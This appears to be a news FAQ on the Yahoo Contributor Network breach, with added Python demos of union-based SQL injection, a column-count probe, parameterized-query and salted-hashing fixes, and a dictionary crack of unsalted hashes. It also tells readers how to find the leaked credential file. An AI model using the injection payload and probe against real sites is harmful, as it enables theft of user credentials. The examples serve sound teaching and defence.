Yahoo's password leak: What you need to know (FAQ) - CNET

Diablo
Yahoo is the latest online service to confirm the disclosure of passwords belonging to hundreds of thousands of its users. Here's what we know -- and, more important, what you need to do to protect yourself.
The Yahoo Contributor Network page
(Credit: Screenshot by David Hamilton/CNET)
Yahoo has just become the latest big online service to suffer a major password breach. While the number of affected users is far smaller than in the last big exposure -- that would be the password hack at LinkedIn last month, which exposed 6.5 million user passwords -- the attack is a big black eye for Yahoo and a potential hazard to the 450,000 or so people whose login information is now flapping in the breeze.
So here is CNET's quick guide to the Yahoo password fumble and what you need to do.
What, exactly, went wrong?
A hacker collective calling itself D33Ds Co. publicly posted more than 450,000 login credentials -- i.e., paired usernames and passwords -- obtained from Yahoo's "Contributor Network" site. In that data dump, the hackers described their attack as a "union-based SQL injection." In that technique, text the site fails to sanitize (a search term or a value in a URL, say) is spliced into one of the site's own database queries with a UNION SELECT clause tacked on, so the database hands back rows from whatever table the attacker names alongside the page's normal results. On a poorly secured site, that is all it takes to read the table holding usernames and passwords.
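To make the technique concrete, here is an added example written for this page; it is neither the attackers' payload nor Yahoo's code. It runs a union-based injection against a small SQLite database constructed for the demonstration: a search query built by string concatenation leaks the users table, the same input against a parameterized query leaks nothing, and a short probe shows how the column count is found by repeated trial queries. The table names, rows and query text are assumptions made for the example.

```python
"""Union-based SQL injection, demonstrated against an in-memory SQLite table.

Added example, not the attackers' payload or Yahoo's code: the 'articles' and
'users' tables, their rows and the search query are constructed for this
demonstration.
"""
import sqlite3


def make_db():
    """Throwaway database: a public articles table the search page is meant to
    read, and a private users table whose passwords sit in plain text."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE articles (id INTEGER, title TEXT, author TEXT);
        CREATE TABLE users (id INTEGER, email TEXT, password TEXT);
        INSERT INTO articles VALUES (1, 'Ten tips for writers', 'alice');
        INSERT INTO articles VALUES (2, 'Cheap weeknight recipes', 'bob');
        INSERT INTO users VALUES (1, 'alice@example.com', 'paidwriter');
        INSERT INTO users VALUES (2, 'bob@example.com', 'writer');
        """
    )
    return con


def search_vulnerable(con, author):
    """The bug: the author name is pasted into the SQL text, so anything the
    user types after a closing quote is executed as SQL."""
    sql = "SELECT title, author FROM articles WHERE author = '" + author + "'"
    return con.execute(sql).fetchall()


def search_safe(con, author):
    """The fix: a bound parameter. The same payload is treated as a literal
    author name that matches nothing."""
    sql = "SELECT title, author FROM articles WHERE author = ?"
    return con.execute(sql, (author,)).fetchall()


def probe_column_count(con, max_cols=8):
    """Attacker-side reconnaissance: a UNION only works when both SELECTs have
    the same number of columns, so append NULL placeholders one at a time until
    the database stops raising a column-mismatch error. This is the repeated
    poking that precedes the real extraction query."""
    for n in range(1, max_cols + 1):
        payload = "x' UNION SELECT " + ", ".join(["NULL"] * n) + " --"
        try:
            search_vulnerable(con, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# Once the column count (2) is known, point the second SELECT at the table
# worth stealing. The leading x' closes the application's quote; the trailing
# -- comments out the quote the application appends.
UNION_PAYLOAD = "x' UNION SELECT email, password FROM users --"


def demo():
    """Returns (rows the vulnerable query leaks, rows the safe query returns)."""
    con = make_db()
    return search_vulnerable(con, UNION_PAYLOAD), search_safe(con, UNION_PAYLOAD)


if __name__ == "__main__":
    con = make_db()
    print("columns in the original query:", probe_column_count(con))
    leaked, safe = demo()
    print("vulnerable query returned:", leaked)
    print("parameterized query returned:", safe)
```

The probe is the part worth remembering from the defender's side: every wrong guess is a database error triggered by a malformed search term, so a burst of such errors from one client against a search form is itself a signal worth alerting on, well before any rows leave the building.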
Which, in this case, yielded a treasure trove of usernames and passwords, apparently all stored in plain text -- itself a serious security failure on Yahoo's part. Passwords are never supposed to be stored as typed. Standard practice is to keep only a salted hash of each one, computed with a deliberately slow function, so that a stolen table does not reveal the passwords outright and each must be guessed individually. (Reversible encryption is not a substitute: whoever can read the table can usually find the key.)
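As an added illustration (example code written for this page, not anything from Yahoo's systems), the block below shows what a password table should hold instead of plain text, and why a fast, unsalted hash would not have been much better. The record layout "pbkdf2_sha256$iterations$salt$digest", the iteration count and the sample passwords are this example's own choices.

```python
"""What a password table should hold instead of plain text.

Added example using only the Python standard library; the record layout
'pbkdf2_sha256$iterations$salt$digest' and the sample passwords are this
example's own conventions, not anything from Yahoo's systems.
"""
import hashlib
import hmac
import os

ITERATIONS = 600_000  # deliberately slow; raise it as hardware gets faster


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record for storage. A fresh random salt per
    password means two users who both chose 'writer' get different records,
    so one precomputed table cannot be reused across the whole dump."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, record):
    """Recompute with the parameters stored in the record and compare in
    constant time, so timing does not leak how many bytes matched."""
    algo, iterations, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format: " + algo)
    actual = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(actual, bytes.fromhex(digest_hex))


def fast_unsalted_hash(password, algo="sha1"):
    """The weak alternative: one fast digest, no salt, same output for every
    user who picked the same password."""
    return hashlib.new(algo, password.encode("utf-8")).hexdigest()


def crack_unsalted(digest_hex, wordlist, algo="sha1"):
    """Why a fast, unsalted hash is only 'masking': hash a list of common
    passwords once and look every leaked digest up in the result."""
    table = {fast_unsalted_hash(word, algo): word for word in wordlist}
    return table.get(digest_hex)


if __name__ == "__main__":
    record = hash_password("writer")
    print(record)
    print("correct password verifies:", verify_password("writer", record))
    print("wrong password verifies:", verify_password("richwriter", record))
    leaked_digest = fast_unsalted_hash("writer")
    print("unsalted sha1 of 'writer' cracked as:",
          crack_unsalted(leaked_digest, ["paidwriter", "writer", "richwriter"]))
```

PBKDF2 is used here because it ships in the standard library; bcrypt, scrypt or Argon2 do the same job with better resistance to GPU-based guessing. The point of the salt and the slow function together is that a dump of "writer" passwords stored this way costs the attacker one expensive computation per guess per user, rather than one lookup for all of them.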
The file of usernames (predominantly email addresses) and passwords, originally published on a public Web site, has since been widely distributed via BitTorrent and various file lockers across the Internet. In other words, this cat is very firmly out of the bag.
For what it's worth, the D33Ds hackers claim they released the information to point up lax security at Yahoo, not for malicious purposes. That said, these possibly sensitive passwords are now available to the maliciously minded across the world. So it's better-safe-than-sorry time.
I've never heard of the Yahoo Contributor Network. Am I really in any danger here?
Maybe, maybe not. The Yahoo Contributor Network is, to be honest, sort of obscure. It was originally an independent site called Associated Content -- a content farm that paid users a pittance to publish their written submissions, plus a bonus for any traffic generated. (Such "low-cost content," as it's known in the biz, is basically a lure used to draw search traffic to ads displayed nearby.) Yahoo acquired Associated Content two years ago, reportedly for more than $100 million.
It's not immediately clear whose login credentials have been exposed. Yahoo has formally confirmed the password breach, but the online media company didn't elaborate on their origin. (See Yahoo's official statement below.) It does, however, seem highly likely that the exposed passwords mostly belong to Yahoo's contributors themselves -- i.e., the individuals who wrote material for either Associated Content or Yahoo.
One big hint: Quite a few of the email addresses and passwords contain the word "writer." I.e., usernames such as "[email protected]" and "[email protected]," and occasionally aspirational passwords such as "paidwriter" and "richwriter." Not to mention umpteen-jillion instances of "writer" as a password.
So if I've never contributed to the Yahoo Contributor Network, I'm safe, right?
Possibly -- but you never know.
In its official statement, Yahoo insists that the "file" the hackers "compromised" was an "older" one. (This statement itself is kind of suspect, since the hackers probably didn't just steal a particular file. More likely, they repeatedly poked a Yahoo database until it started spitting out login credentials. But set that aside for now.) The company claims that fewer than five percent of the Yahoo passwords disclosed are currently valid.
Which all sounds reassuring enough, except that no one with a Yahoo ID has any way to know whether it might have been compromised elsewhere within the site. And, of course, you won't know until either a public-spirited group like D33Ds decides to publish your password -- or you get hacked in a more malicious fashion. (You are free to believe that the hack of the Yahoo contributor network was an isolated incident, and maybe it was. But maybe it wasn't.)
I get the sense you're leading up to something. Go on.
Yahoo's statement, however, is silent on the non-Yahoo credentials revealed in the D33Ds hack. The published file also contains a huge number of what appear to be login credentials for many other email services, including Gmail (106,873 instances), Hotmail (55,148), AOL (25,521) and any number of ISPs (Comcast, Cox, Mindspring, etc.).
Presumably the pre-merger Associated Content allowed users to use email addresses as their usernames, and Yahoo never forced users to change their logins to Yahoo ID. These days, in fact, Yahoo still allows people to sign into the contributor network via Google or Facebook IDs in addition to their Yahoo accounts.
All of which suggests that close to 300,000 people could have just seen their personal, non-Yahoo email accounts compromised as well as their Yahoo accounts. They've effectively just dropped a trail of breadcrumbs to their personal email, since they've identified the service, their username and (assuming general laziness on the part of Internet users, which is usually a safe bet) their password.
OK, so how do I know if I'm at risk?
To be on the safe side, if you have a Yahoo ID, you should assume its password is no longer secure and change it. (I just did, and I've never visited the Yahoo Voices site until today.) You should also change other passwords if:

  • You've used the same password for any other major service -- particularly for sensitive accounts such as banking, investing, or email.
  • You've ever signed into Yahoo or Associated Content with a non-Yahoo email address.
Yes, it's a pain. But it only takes a few minutes, and the peace of mind is worth it. You really don't want to find your email account hijacked or your bank account emptied, do you?
If you're one of those folks who likes to live dangerously, you can always call up the file of leaked credentials (just Google "yahoo-disclosure.txt") and see if your email or Yahoo ID is on there. Finding your address there proves you are affected; not finding it proves nothing, and of course there's no way to know if your password might have been exposed elsewhere -- at least until it's too late.
So do the smart thing. Change your Yahoo ID password and any other passwords associated with email addresses listed in this disclosure.
Where is Yahoo's official statement on all this?
Glad you asked. It's right here:
At Yahoo! we take security very seriously and invest heavily in protective measures to ensure the security of our users and their data across all our products. We confirm that an older file from Yahoo! Contributor Network (previously Associated Content) containing approximately 450,000 Yahoo! and other company user names and passwords was compromised yesterday, July 11. Of these, less than 5% of the Yahoo! accounts had valid passwords. We are taking immediate action by fixing the vulnerability that led to the disclosure of this data, changing the passwords of the affected Yahoo! users and notifying the companies whose users' accounts may have been compromised. We apologize to all affected users. We encourage users to change their passwords on a regular basis and also familiarize themselves with our online safety tips at security.yahoo.com.